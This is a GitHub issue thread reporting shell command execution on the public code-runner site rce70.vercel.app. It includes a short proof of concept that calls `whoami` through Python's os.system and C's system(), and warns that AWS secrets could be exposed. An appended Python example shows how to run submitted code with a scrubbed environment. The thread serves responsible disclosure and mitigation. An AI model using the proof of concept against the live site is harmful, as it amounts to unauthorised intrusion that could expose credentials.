suyashvsingh / rce70-lambda

Serverless files for RCE70

Shell command execution on site rce70.vercel.app, if using Python, C/C++ and Java #1

Open Reedus0 opened 9 months ago

Reedus0 commented 9 months ago

# Description

Allowing users to write arbitrary code causes shell command execution.

# Proof of concept

  1. Go to https://rce70.vercel.app/
  2. Choose one of the languages: Python, C/C++
  3. Use the code below for your language
  4. Run the code
### Python

```python
import os

os.system("whoami")
```

### C/C++

```c
#include <stdlib.h>  /* system() */

int main() {
    system("whoami");
    return 0;
}
```

# Impact

This vulnerability can cause sensitive data exposure; for example, AWS secret keys and tokens could be exposed. The Java language is also affected by this vulnerability.
suyashvsingh commented 9 months ago

Thanks for bringing it to my notice.
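Since the thread only reports the issue, here is an added example (not code from the rce70-lambda project) of the first mitigation a runner like this needs: executing the submitted program in a child process with an allowlisted environment, so the AWS credentials the impact section mentions are never inherited. The function names and the constructed AWS_SECRET_ACCESS_KEY value are assumptions.

```python
import os
import subprocess
import sys
import tempfile


def scrubbed_env() -> dict:
    """Build a minimal child environment instead of inheriting the runner's.

    An allowlist is used rather than stripping AWS_*: credentials are not the
    only secret-bearing variables a Lambda or CI runner carries.
    """
    keep = {}
    for key in ("PATH", "SYSTEMROOT"):  # SYSTEMROOT only matters on Windows
        if key in os.environ:
            keep[key] = os.environ[key]
    return keep


def run_untrusted_python(source: str, timeout: float = 5.0) -> subprocess.CompletedProcess:
    """Run user-submitted Python in a child that does not inherit the runner's environment.

    This is environment hygiene only: it stops credential leakage through
    os.environ but does not confine what the submitted code can do on the host.
    """
    with tempfile.NamedTemporaryFile("w", suffix=".py", delete=False) as handle:
        handle.write(source)
        path = handle.name
    try:
        return subprocess.run(
            [sys.executable, "-I", path],  # -I: isolated mode, ignores PYTHON* vars and user site
            env=scrubbed_env(),
            capture_output=True,
            text=True,
            timeout=timeout,
        )
    finally:
        os.unlink(path)


def credential_visible_to_child(secret_value: str) -> bool:
    """Plant a constructed credential in the runner's env and check whether user code can read it."""
    os.environ["AWS_SECRET_ACCESS_KEY"] = secret_value  # constructed value, not a real key
    probe = "import os; print(os.environ.get('AWS_SECRET_ACCESS_KEY', 'absent'))"
    result = run_untrusted_python(probe)
    return secret_value in result.stdout


if __name__ == "__main__":
    print("leaked:", credential_visible_to_child("CONSTRUCTED-NOT-A-REAL-SECRET"))  # leaked: False
```

This is one layer only: the child can still run shell commands, so the execution role should also carry the least privilege the runner itself needs, and CPU, memory and network limits belong in the sandbox around it.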